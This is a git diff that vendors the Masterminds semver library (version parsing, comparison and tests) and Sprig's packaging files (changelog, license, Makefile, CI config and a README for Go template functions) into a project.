+// both prerelease and metadata values. +const ValidPrerelease string = `^([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*)` + +// Version represents a single semantic version. 
+type Version struct { + major, minor, patch int64 + pre string + metadata string + original string +} + +func init() { + versionRegex = regexp.MustCompile("^" + SemVerRegex + "$") + validPrereleaseRegex = regexp.MustCompile(ValidPrerelease) +} + +// NewVersion parses a given version and returns an instance of Version or +// an error if unable to parse the version. +func NewVersion(v string) (*Version, error) { + m := versionRegex.FindStringSubmatch(v) + if m == nil { + return nil, ErrInvalidSemVer + } + + sv := &Version{ + metadata: m[8], + pre: m[5], + original: v, + } + + var temp int64 + temp, err := strconv.ParseInt(m[1], 10, 64) + if err != nil { + return nil, fmt.Errorf("Error parsing version segment: %s", err) + } + sv.major = temp + + if m[2] != "" { + temp, err = strconv.ParseInt(strings.TrimPrefix(m[2], "."), 10, 64) + if err != nil { + return nil, fmt.Errorf("Error parsing version segment: %s", err) + } + sv.minor = temp + } else { + sv.minor = 0 + } + + if m[3] != "" { + temp, err = strconv.ParseInt(strings.TrimPrefix(m[3], "."), 10, 64) + if err != nil { + return nil, fmt.Errorf("Error parsing version segment: %s", err) + } + sv.patch = temp + } else { + sv.patch = 0 + } + + return sv, nil +} + +// MustParse parses a given version and panics on error. +func MustParse(v string) *Version { + sv, err := NewVersion(v) + if err != nil { + panic(err) + } + return sv +} + +// String converts a Version object to a string. +// Note, if the original version contained a leading v this version will not. +// See the Original() method to retrieve the original value. Semantic Versions +// don't contain a leading v per the spec. Instead it's optional on +// impelementation. 
+func (v *Version) String() string { + var buf bytes.Buffer + + fmt.Fprintf(&buf, "%d.%d.%d", v.major, v.minor, v.patch) + if v.pre != "" { + fmt.Fprintf(&buf, "-%s", v.pre) + } + if v.metadata != "" { + fmt.Fprintf(&buf, "+%s", v.metadata) + } + + return buf.String() +} + +// Original returns the original value passed in to be parsed. +func (v *Version) Original() string { + return v.original +} + +// Major returns the major version. +func (v *Version) Major() int64 { + return v.major +} + +// Minor returns the minor version. +func (v *Version) Minor() int64 { + return v.minor +} + +// Patch returns the patch version. +func (v *Version) Patch() int64 { + return v.patch +} + +// Prerelease returns the pre-release version. +func (v *Version) Prerelease() string { + return v.pre +} + +// Metadata returns the metadata on the version. +func (v *Version) Metadata() string { + return v.metadata +} + +// originalVPrefix returns the original 'v' prefix if any. +func (v *Version) originalVPrefix() string { + + // Note, only lowercase v is supported as a prefix by the parser. + if v.original != "" && v.original[:1] == "v" { + return v.original[:1] + } + return "" +} + +// IncPatch produces the next patch version. +// If the current version does not have prerelease/metadata information, +// it unsets metadata and prerelease values, increments patch number. +// If the current version has any of prerelease or metadata information, +// it unsets both values and keeps curent patch value +func (v Version) IncPatch() Version { + vNext := v + // according to http://semver.org/#spec-item-9 + // Pre-release versions have a lower precedence than the associated normal version. + // according to http://semver.org/#spec-item-10 + // Build metadata SHOULD be ignored when determining version precedence. 
+ if v.pre != "" { + vNext.metadata = "" + vNext.pre = "" + } else { + vNext.metadata = "" + vNext.pre = "" + vNext.patch = v.patch + 1 + } + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext +} + +// IncMinor produces the next minor version. +// Sets patch to 0. +// Increments minor number. +// Unsets metadata. +// Unsets prerelease status. +func (v Version) IncMinor() Version { + vNext := v + vNext.metadata = "" + vNext.pre = "" + vNext.patch = 0 + vNext.minor = v.minor + 1 + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext +} + +// IncMajor produces the next major version. +// Sets patch to 0. +// Sets minor to 0. +// Increments major number. +// Unsets metadata. +// Unsets prerelease status. +func (v Version) IncMajor() Version { + vNext := v + vNext.metadata = "" + vNext.pre = "" + vNext.patch = 0 + vNext.minor = 0 + vNext.major = v.major + 1 + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext +} + +// SetPrerelease defines the prerelease value. +// Value must not include the required 'hypen' prefix. +func (v Version) SetPrerelease(prerelease string) (Version, error) { + vNext := v + if len(prerelease) > 0 && !validPrereleaseRegex.MatchString(prerelease) { + return vNext, ErrInvalidPrerelease + } + vNext.pre = prerelease + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext, nil +} + +// SetMetadata defines metadata value. +// Value must not include the required 'plus' prefix. +func (v Version) SetMetadata(metadata string) (Version, error) { + vNext := v + if len(metadata) > 0 && !validPrereleaseRegex.MatchString(metadata) { + return vNext, ErrInvalidMetadata + } + vNext.metadata = metadata + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext, nil +} + +// LessThan tests if one version is less than another one. 
+func (v *Version) LessThan(o *Version) bool { + return v.Compare(o) < 0 +} + +// GreaterThan tests if one version is greater than another one. +func (v *Version) GreaterThan(o *Version) bool { + return v.Compare(o) > 0 +} + +// Equal tests if two versions are equal to each other. +// Note, versions can be equal with different metadata since metadata +// is not considered part of the comparable version. +func (v *Version) Equal(o *Version) bool { + return v.Compare(o) == 0 +} + +// Compare compares this version to another one. It returns -1, 0, or 1 if +// the version smaller, equal, or larger than the other version. +// +// Versions are compared by X.Y.Z. Build metadata is ignored. Prerelease is +// lower than the version without a prerelease. +func (v *Version) Compare(o *Version) int { + // Compare the major, minor, and patch version for differences. If a + // difference is found return the comparison. + if d := compareSegment(v.Major(), o.Major()); d != 0 { + return d + } + if d := compareSegment(v.Minor(), o.Minor()); d != 0 { + return d + } + if d := compareSegment(v.Patch(), o.Patch()); d != 0 { + return d + } + + // At this point the major, minor, and patch versions are the same. + ps := v.pre + po := o.Prerelease() + + if ps == "" && po == "" { + return 0 + } + if ps == "" { + return 1 + } + if po == "" { + return -1 + } + + return comparePrerelease(ps, po) +} + +// UnmarshalJSON implements JSON.Unmarshaler interface. +func (v *Version) UnmarshalJSON(b []byte) error { + var s string + if err := json.Unmarshal(b, &s); err != nil { + return err + } + temp, err := NewVersion(s) + if err != nil { + return err + } + v.major = temp.major + v.minor = temp.minor + v.patch = temp.patch + v.pre = temp.pre + v.metadata = temp.metadata + v.original = temp.original + temp = nil + return nil +} + +// MarshalJSON implements JSON.Marshaler interface. 
+func (v *Version) MarshalJSON() ([]byte, error) { + return json.Marshal(v.String()) +} + +func compareSegment(v, o int64) int { + if v < o { + return -1 + } + if v > o { + return 1 + } + + return 0 +} + +func comparePrerelease(v, o string) int { + + // split the prelease versions by their part. The separator, per the spec, + // is a . + sparts := strings.Split(v, ".") + oparts := strings.Split(o, ".") + + // Find the longer length of the parts to know how many loop iterations to + // go through. + slen := len(sparts) + olen := len(oparts) + + l := slen + if olen > slen { + l = olen + } + + // Iterate over each part of the prereleases to compare the differences. + for i := 0; i < l; i++ { + // Since the lentgh of the parts can be different we need to create + // a placeholder. This is to avoid out of bounds issues. + stemp := "" + if i < slen { + stemp = sparts[i] + } + + otemp := "" + if i < olen { + otemp = oparts[i] + } + + d := comparePrePart(stemp, otemp) + if d != 0 { + return d + } + } + + // Reaching here means two versions are of equal value but have different + // metadata (the part following a +). They are not identical in string form + // but the version comparison finds them to be equal. + return 0 +} + +func comparePrePart(s, o string) int { + // Fastpath if they are equal + if s == o { + return 0 + } + + // When s or o are empty we can use the other in an attempt to determine + // the response. + if s == "" { + if o != "" { + return -1 + } + return 1 + } + + if o == "" { + if s != "" { + return 1 + } + return -1 + } + + // When comparing strings "99" is greater than "103". To handle + // cases like this we need to detect numbers and compare them. 
+ + oi, n1 := strconv.ParseInt(o, 10, 64) + si, n2 := strconv.ParseInt(s, 10, 64) + + // The case where both are strings compare the strings + if n1 != nil && n2 != nil { + if s > o { + return 1 + } + return -1 + } else if n1 != nil { + // o is a string and s is a number + return -1 + } else if n2 != nil { + // s is a string and o is a number + return 1 + } + // Both are numbers + if si > oi { + return 1 + } + return -1 + +} diff --git a/vendor/github.com/Masterminds/semver/version_test.go b/vendor/github.com/Masterminds/semver/version_test.go new file mode 100644 index 0000000000..ff5d644a74 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/version_test.go @@ -0,0 +1,490 @@ +package semver + +import ( + "encoding/json" + "fmt" + "testing" +) + +func TestNewVersion(t *testing.T) { + tests := []struct { + version string + err bool + }{ + {"1.2.3", false}, + {"v1.2.3", false}, + {"1.0", false}, + {"v1.0", false}, + {"1", false}, + {"v1", false}, + {"1.2.beta", true}, + {"v1.2.beta", true}, + {"foo", true}, + {"1.2-5", false}, + {"v1.2-5", false}, + {"1.2-beta.5", false}, + {"v1.2-beta.5", false}, + {"\n1.2", true}, + {"\nv1.2", true}, + {"1.2.0-x.Y.0+metadata", false}, + {"v1.2.0-x.Y.0+metadata", false}, + {"1.2.0-x.Y.0+metadata-width-hypen", false}, + {"v1.2.0-x.Y.0+metadata-width-hypen", false}, + {"1.2.3-rc1-with-hypen", false}, + {"v1.2.3-rc1-with-hypen", false}, + {"1.2.3.4", true}, + {"v1.2.3.4", true}, + {"1.2.2147483648", false}, + {"1.2147483648.3", false}, + {"2147483648.3.0", false}, + } + + for _, tc := range tests { + _, err := NewVersion(tc.version) + if tc.err && err == nil { + t.Fatalf("expected error for version: %s", tc.version) + } else if !tc.err && err != nil { + t.Fatalf("error for version %s: %s", tc.version, err) + } + } +} + +func TestOriginal(t *testing.T) { + tests := []string{ + "1.2.3", + "v1.2.3", + "1.0", + "v1.0", + "1", + "v1", + "1.2-5", + "v1.2-5", + "1.2-beta.5", + "v1.2-beta.5", + "1.2.0-x.Y.0+metadata", + 
"v1.2.0-x.Y.0+metadata", + "1.2.0-x.Y.0+metadata-width-hypen", + "v1.2.0-x.Y.0+metadata-width-hypen", + "1.2.3-rc1-with-hypen", + "v1.2.3-rc1-with-hypen", + } + + for _, tc := range tests { + v, err := NewVersion(tc) + if err != nil { + t.Errorf("Error parsing version %s", tc) + } + + o := v.Original() + if o != tc { + t.Errorf("Error retrieving originl. Expected '%s' but got '%s'", tc, v) + } + } +} + +func TestParts(t *testing.T) { + v, err := NewVersion("1.2.3-beta.1+build.123") + if err != nil { + t.Error("Error parsing version 1.2.3-beta.1+build.123") + } + + if v.Major() != 1 { + t.Error("Major() returning wrong value") + } + if v.Minor() != 2 { + t.Error("Minor() returning wrong value") + } + if v.Patch() != 3 { + t.Error("Patch() returning wrong value") + } + if v.Prerelease() != "beta.1" { + t.Error("Prerelease() returning wrong value") + } + if v.Metadata() != "build.123" { + t.Error("Metadata() returning wrong value") + } +} + +func TestString(t *testing.T) { + tests := []struct { + version string + expected string + }{ + {"1.2.3", "1.2.3"}, + {"v1.2.3", "1.2.3"}, + {"1.0", "1.0.0"}, + {"v1.0", "1.0.0"}, + {"1", "1.0.0"}, + {"v1", "1.0.0"}, + {"1.2-5", "1.2.0-5"}, + {"v1.2-5", "1.2.0-5"}, + {"1.2-beta.5", "1.2.0-beta.5"}, + {"v1.2-beta.5", "1.2.0-beta.5"}, + {"1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"}, + {"v1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"}, + {"1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"}, + {"v1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"}, + {"1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"}, + {"v1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"}, + } + + for _, tc := range tests { + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("Error parsing version %s", tc) + } + + s := v.String() + if s != tc.expected { + t.Errorf("Error generating string. 
Expected '%s' but got '%s'", tc.expected, s) + } + } +} + +func TestCompare(t *testing.T) { + tests := []struct { + v1 string + v2 string + expected int + }{ + {"1.2.3", "1.5.1", -1}, + {"2.2.3", "1.5.1", 1}, + {"2.2.3", "2.2.2", 1}, + {"3.2-beta", "3.2-beta", 0}, + {"1.3", "1.1.4", 1}, + {"4.2", "4.2-beta", 1}, + {"4.2-beta", "4.2", -1}, + {"4.2-alpha", "4.2-beta", -1}, + {"4.2-alpha", "4.2-alpha", 0}, + {"4.2-beta.2", "4.2-beta.1", 1}, + {"4.2-beta2", "4.2-beta1", 1}, + {"4.2-beta", "4.2-beta.2", -1}, + {"4.2-beta", "4.2-beta.foo", -1}, + {"4.2-beta.2", "4.2-beta", 1}, + {"4.2-beta.foo", "4.2-beta", 1}, + {"1.2+bar", "1.2+baz", 0}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := NewVersion(tc.v2) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + a := v1.Compare(v2) + e := tc.expected + if a != e { + t.Errorf( + "Comparison of '%s' and '%s' failed. Expected '%d', got '%d'", + tc.v1, tc.v2, e, a, + ) + } + } +} + +func TestLessThan(t *testing.T) { + tests := []struct { + v1 string + v2 string + expected bool + }{ + {"1.2.3", "1.5.1", true}, + {"2.2.3", "1.5.1", false}, + {"3.2-beta", "3.2-beta", false}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := NewVersion(tc.v2) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + a := v1.LessThan(v2) + e := tc.expected + if a != e { + t.Errorf( + "Comparison of '%s' and '%s' failed. 
Expected '%t', got '%t'", + tc.v1, tc.v2, e, a, + ) + } + } +} + +func TestGreaterThan(t *testing.T) { + tests := []struct { + v1 string + v2 string + expected bool + }{ + {"1.2.3", "1.5.1", false}, + {"2.2.3", "1.5.1", true}, + {"3.2-beta", "3.2-beta", false}, + {"3.2.0-beta.1", "3.2.0-beta.5", false}, + {"3.2-beta.4", "3.2-beta.2", true}, + {"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.103", false}, + {"7.43.0-SNAPSHOT.FOO", "7.43.0-SNAPSHOT.103", true}, + {"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.BAR", false}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := NewVersion(tc.v2) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + a := v1.GreaterThan(v2) + e := tc.expected + if a != e { + t.Errorf( + "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'", + tc.v1, tc.v2, e, a, + ) + } + } +} + +func TestEqual(t *testing.T) { + tests := []struct { + v1 string + v2 string + expected bool + }{ + {"1.2.3", "1.5.1", false}, + {"2.2.3", "1.5.1", false}, + {"3.2-beta", "3.2-beta", true}, + {"3.2-beta+foo", "3.2-beta+bar", true}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := NewVersion(tc.v2) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + a := v1.Equal(v2) + e := tc.expected + if a != e { + t.Errorf( + "Comparison of '%s' and '%s' failed. 
Expected '%t', got '%t'", + tc.v1, tc.v2, e, a, + ) + } + } +} + +func TestInc(t *testing.T) { + tests := []struct { + v1 string + expected string + how string + expectedOriginal string + }{ + {"1.2.3", "1.2.4", "patch", "1.2.4"}, + {"v1.2.4", "1.2.5", "patch", "v1.2.5"}, + {"1.2.3", "1.3.0", "minor", "1.3.0"}, + {"v1.2.4", "1.3.0", "minor", "v1.3.0"}, + {"1.2.3", "2.0.0", "major", "2.0.0"}, + {"v1.2.4", "2.0.0", "major", "v2.0.0"}, + {"1.2.3+meta", "1.2.4", "patch", "1.2.4"}, + {"1.2.3-beta+meta", "1.2.3", "patch", "1.2.3"}, + {"v1.2.4-beta+meta", "1.2.4", "patch", "v1.2.4"}, + {"1.2.3-beta+meta", "1.3.0", "minor", "1.3.0"}, + {"v1.2.4-beta+meta", "1.3.0", "minor", "v1.3.0"}, + {"1.2.3-beta+meta", "2.0.0", "major", "2.0.0"}, + {"v1.2.4-beta+meta", "2.0.0", "major", "v2.0.0"}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + var v2 Version + switch tc.how { + case "patch": + v2 = v1.IncPatch() + case "minor": + v2 = v1.IncMinor() + case "major": + v2 = v1.IncMajor() + } + + a := v2.String() + e := tc.expected + if a != e { + t.Errorf( + "Inc %q failed. Expected %q got %q", + tc.how, e, a, + ) + } + + a = v2.Original() + e = tc.expectedOriginal + if a != e { + t.Errorf( + "Inc %q failed. 
Expected original %q got %q", + tc.how, e, a, + ) + } + } +} + +func TestSetPrerelease(t *testing.T) { + tests := []struct { + v1 string + prerelease string + expectedVersion string + expectedPrerelease string + expectedOriginal string + expectedErr error + }{ + {"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidPrerelease}, + {"1.2.3", "beta", "1.2.3-beta", "beta", "1.2.3-beta", nil}, + {"v1.2.4", "beta", "1.2.4-beta", "beta", "v1.2.4-beta", nil}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := v1.SetPrerelease(tc.prerelease) + if err != tc.expectedErr { + t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err) + } + + a := v2.Prerelease() + e := tc.expectedPrerelease + if a != e { + t.Errorf("Expected prerelease value=%q, but got %q", e, a) + } + + a = v2.String() + e = tc.expectedVersion + if a != e { + t.Errorf("Expected version string=%q, but got %q", e, a) + } + + a = v2.Original() + e = tc.expectedOriginal + if a != e { + t.Errorf("Expected version original=%q, but got %q", e, a) + } + } +} + +func TestSetMetadata(t *testing.T) { + tests := []struct { + v1 string + metadata string + expectedVersion string + expectedMetadata string + expectedOriginal string + expectedErr error + }{ + {"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidMetadata}, + {"1.2.3", "meta", "1.2.3+meta", "meta", "1.2.3+meta", nil}, + {"v1.2.4", "meta", "1.2.4+meta", "meta", "v1.2.4+meta", nil}, + } + + for _, tc := range tests { + v1, err := NewVersion(tc.v1) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + v2, err := v1.SetMetadata(tc.metadata) + if err != tc.expectedErr { + t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err) + } + + a := v2.Metadata() + e := tc.expectedMetadata + if a != e { + t.Errorf("Expected metadata value=%q, but got %q", e, a) + } + + a = v2.String() + e = tc.expectedVersion + if e != a { + t.Errorf("Expected 
version string=%q, but got %q", e, a) + } + + a = v2.Original() + e = tc.expectedOriginal + if a != e { + t.Errorf("Expected version original=%q, but got %q", e, a) + } + } +} + +func TestOriginalVPrefix(t *testing.T) { + tests := []struct { + version string + vprefix string + }{ + {"1.2.3", ""}, + {"v1.2.4", "v"}, + } + + for _, tc := range tests { + v1, _ := NewVersion(tc.version) + a := v1.originalVPrefix() + e := tc.vprefix + if a != e { + t.Errorf("Expected vprefix=%q, but got %q", e, a) + } + } +} + +func TestJsonMarshal(t *testing.T) { + sVer := "1.1.1" + x, err := NewVersion(sVer) + if err != nil { + t.Errorf("Error creating version: %s", err) + } + out, err2 := json.Marshal(x) + if err2 != nil { + t.Errorf("Error marshaling version: %s", err2) + } + got := string(out) + want := fmt.Sprintf("%q", sVer) + if got != want { + t.Errorf("Error marshaling unexpected marshaled content: got=%q want=%q", got, want) + } +} + +func TestJsonUnmarshal(t *testing.T) { + sVer := "1.1.1" + ver := &Version{} + err := json.Unmarshal([]byte(fmt.Sprintf("%q", sVer)), ver) + if err != nil { + t.Errorf("Error unmarshaling version: %s", err) + } + got := ver.String() + want := sVer + if got != want { + t.Errorf("Error unmarshaling unexpected object content: got=%q want=%q", got, want) + } +} diff --git a/vendor/github.com/Masterminds/sprig/.gitignore b/vendor/github.com/Masterminds/sprig/.gitignore new file mode 100644 index 0000000000..5e3002f88f --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/.gitignore @@ -0,0 +1,2 @@ +vendor/ +/.glide diff --git a/vendor/github.com/Masterminds/sprig/.travis.yml b/vendor/github.com/Masterminds/sprig/.travis.yml new file mode 100644 index 0000000000..2e7c2d68e3 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/.travis.yml @@ -0,0 +1,23 @@ +language: go + +go: + - 1.9.x + - 1.10.x + - tip + +# Setting sudo access to false will let Travis CI use containers rather than +# VMs to run the tests. 
For more details see: +# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/ +# - http://docs.travis-ci.com/user/workers/standard-infrastructure/ +sudo: false + +script: + - make setup test + +notifications: + webhooks: + urls: + - https://webhooks.gitter.im/e/06e3328629952dabe3e0 + on_success: change # options: [always|never|change] default: always + on_failure: always # options: [always|never|change] default: always + on_start: never # options: [always|never|change] default: always diff --git a/vendor/github.com/Masterminds/sprig/CHANGELOG.md b/vendor/github.com/Masterminds/sprig/CHANGELOG.md new file mode 100644 index 0000000000..445937138a --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/CHANGELOG.md @@ -0,0 +1,153 @@ +# Changelog + +## Release 2.15.0 (2018-04-02) + +### Added + +- #68 and #69: Add json helpers to docs (thanks @arunvelsriram) +- #66: Add ternary function (thanks @binoculars) +- #67: Allow keys function to take multiple dicts (thanks @binoculars) +- #89: Added sha1sum to crypto function (thanks @benkeil) +- #81: Allow customizing Root CA that used by genSignedCert (thanks @chenzhiwei) +- #92: Add travis testing for go 1.10 +- #93: Adding appveyor config for windows testing + +### Changed + +- #90: Updating to more recent dependencies +- #73: replace satori/go.uuid with google/uuid (thanks @petterw) + +### Fixed + +- #76: Fixed documentation typos (thanks @Thiht) +- Fixed rounding issue on the `ago` function. Note, the removes support for Go 1.8 and older + +## Release 2.14.1 (2017-12-01) + +### Fixed + +- #60: Fix typo in function name documentation (thanks @neil-ca-moore) +- #61: Removing line with {{ due to blocking github pages genertion +- #64: Update the list functions to handle int, string, and other slices for compatibility + +## Release 2.14.0 (2017-10-06) + +This new version of Sprig adds a set of functions for generating and working with SSL certificates. 
+ +- `genCA` generates an SSL Certificate Authority +- `genSelfSignedCert` generates an SSL self-signed certificate +- `genSignedCert` generates an SSL certificate and key based on a given CA + +## Release 2.13.0 (2017-09-18) + +This release adds new functions, including: + +- `regexMatch`, `regexFindAll`, `regexFind`, `regexReplaceAll`, `regexReplaceAllLiteral`, and `regexSplit` to work with regular expressions +- `floor`, `ceil`, and `round` math functions +- `toDate` converts a string to a date +- `nindent` is just like `indent` but also prepends a new line +- `ago` returns the time from `time.Now` + +### Added + +- #40: Added basic regex functionality (thanks @alanquillin) +- #41: Added ceil floor and round functions (thanks @alanquillin) +- #48: Added toDate function (thanks @andreynering) +- #50: Added nindent function (thanks @binoculars) +- #46: Added ago function (thanks @slayer) + +### Changed + +- #51: Updated godocs to include new string functions (thanks @curtisallen) +- #49: Added ability to merge multiple dicts (thanks @binoculars) + +## Release 2.12.0 (2017-05-17) + +- `snakecase`, `camelcase`, and `shuffle` are three new string functions +- `fail` allows you to bail out of a template render when conditions are not met + +## Release 2.11.0 (2017-05-02) + +- Added `toJson` and `toPrettyJson` +- Added `merge` +- Refactored documentation + +## Release 2.10.0 (2017-03-15) + +- Added `semver` and `semverCompare` for Semantic Versions +- `list` replaces `tuple` +- Fixed issue with `join` +- Added `first`, `last`, `intial`, `rest`, `prepend`, `append`, `toString`, `toStrings`, `sortAlpha`, `reverse`, `coalesce`, `pluck`, `pick`, `compact`, `keys`, `omit`, `uniq`, `has`, `without` + +## Release 2.9.0 (2017-02-23) + +- Added `splitList` to split a list +- Added crypto functions of `genPrivateKey` and `derivePassword` + +## Release 2.8.0 (2016-12-21) + +- Added access to several path functions (`base`, `dir`, `clean`, `ext`, and `abs`) +- Added functions for 
_mutating_ dictionaries (`set`, `unset`, `hasKey`) + +## Release 2.7.0 (2016-12-01) + +- Added `sha256sum` to generate a hash of an input +- Added functions to convert a numeric or string to `int`, `int64`, `float64` + +## Release 2.6.0 (2016-10-03) + +- Added a `uuidv4` template function for generating UUIDs inside of a template. + +## Release 2.5.0 (2016-08-19) + +- New `trimSuffix`, `trimPrefix`, `hasSuffix`, and `hasPrefix` functions +- New aliases have been added for a few functions that didn't follow the naming conventions (`trimAll` and `abbrevBoth`) +- `trimall` and `abbrevboth` (notice the case) are deprecated and will be removed in 3.0.0 + +## Release 2.4.0 (2016-08-16) + +- Adds two functions: `until` and `untilStep` + +## Release 2.3.0 (2016-06-21) + +- cat: Concatenate strings with whitespace separators. +- replace: Replace parts of a string: `replace " " "-" "Me First"` renders "Me-First" +- plural: Format plurals: `len "foo" | plural "one foo" "many foos"` renders "many foos" +- indent: Indent blocks of text in a way that is sensitive to "\n" characters. + +## Release 2.2.0 (2016-04-21) + +- Added a `genPrivateKey` function (Thanks @bacongobbler) + +## Release 2.1.0 (2016-03-30) + +- `default` now prints the default value when it does not receive a value down the pipeline. It is much safer now to do `{{.Foo | default "bar"}}`. +- Added accessors for "hermetic" functions. These return only functions that, when given the same input, produce the same output. + +## Release 2.0.0 (2016-03-29) + +Because we switched from `int` to `int64` as the return value for all integer math functions, the library's major version number has been incremented. 
+ +- `min` complements `max` (formerly `biggest`) +- `empty` indicates that a value is the empty value for its type +- `tuple` creates a tuple inside of a template: `{{$t := tuple "a", "b" "c"}}` +- `dict` creates a dictionary inside of a template `{{$d := dict "key1" "val1" "key2" "val2"}}` +- Date formatters have been added for HTML dates (as used in `date` input fields) +- Integer math functions can convert from a number of types, including `string` (via `strconv.ParseInt`). + +## Release 1.2.0 (2016-02-01) + +- Added quote and squote +- Added b32enc and b32dec +- add now takes varargs +- biggest now takes varargs + +## Release 1.1.0 (2015-12-29) + +- Added #4: Added contains function. strings.Contains, but with the arguments + switched to simplify common pipelines. (thanks krancour) +- Added Travis-CI testing support + +## Release 1.0.0 (2015-12-23) + +- Initial release diff --git a/vendor/github.com/Masterminds/sprig/LICENSE.txt b/vendor/github.com/Masterminds/sprig/LICENSE.txt new file mode 100644 index 0000000000..5c95accc2e --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/LICENSE.txt @@ -0,0 +1,20 @@ +Sprig +Copyright (C) 2013 Masterminds + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/vendor/github.com/Masterminds/sprig/Makefile b/vendor/github.com/Masterminds/sprig/Makefile new file mode 100644 index 0000000000..63a93fdf79 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/Makefile @@ -0,0 +1,13 @@ + +HAS_GLIDE := $(shell command -v glide;) + +.PHONY: test +test: + go test -v . + +.PHONY: setup +setup: +ifndef HAS_GLIDE + go get -u github.com/Masterminds/glide +endif + glide install diff --git a/vendor/github.com/Masterminds/sprig/README.md b/vendor/github.com/Masterminds/sprig/README.md new file mode 100644 index 0000000000..25bf3d4f4b --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/README.md @@ -0,0 +1,81 @@ +# Sprig: Template functions for Go templates +[![Stability: Sustained](https://masterminds.github.io/stability/sustained.svg)](https://masterminds.github.io/stability/sustained.html) +[![Build Status](https://travis-ci.org/Masterminds/sprig.svg?branch=master)](https://travis-ci.org/Masterminds/sprig) + +The Go language comes with a [built-in template +language](http://golang.org/pkg/text/template/), but not +very many template functions. This library provides a group of commonly +used template functions. + +It is inspired by the template functions found in +[Twig](http://twig.sensiolabs.org/documentation) and also in various +JavaScript libraries, such as [underscore.js](http://underscorejs.org/). + +## Usage + +Template developers can read the [Sprig function documentation](http://masterminds.github.io/sprig/) to +learn about the >100 template functions available. 
+ +For Go developers wishing to include Sprig as a library in their programs, +API documentation is available [at GoDoc.org](http://godoc.org/github.com/Masterminds/sprig), but +read on for standard usage. + +### Load the Sprig library + +To load the Sprig `FuncMap`: + +```go + +import ( + "github.com/Masterminds/sprig" + "html/template" +) + +// This example illustrates that the FuncMap *must* be set before the +// templates themselves are loaded. +tpl := template.Must( + template.New("base").Funcs(sprig.FuncMap()).ParseGlob("*.html") +) + + +``` + +### Call the functions inside of templates + +By convention, all functions are lowercase. This seems to follow the Go +idiom for template functions (as opposed to template methods, which are +TitleCase). + + +Example: + +``` +{{ "hello!" | upper | repeat 5 }} +``` + +Produces: + +``` +HELLO!HELLO!HELLO!HELLO!HELLO! +``` + +## Principles: + +The following principles were used in deciding on which functions to add, and +determining how to implement them. + +- Template functions should be used to build layout. Therefore, the following + types of operations are within the domain of template functions: + - Formatting + - Layout + - Simple type conversions + - Utilities that assist in handling common formatting and layout needs (e.g. arithmetic) +- Template functions should not return errors unless there is no way to print + a sensible value. For example, converting a string to an integer should not + produce an error if conversion fails. Instead, it should display a default + value that can be displayed. +- Simple math is necessary for grid layouts, pagers, and so on. Complex math + (anything other than arithmetic) should be done outside of templates. +- Template functions only deal with the data passed into them. They never retrieve + data from a source. +- Finally, do not override core Go template functions. 
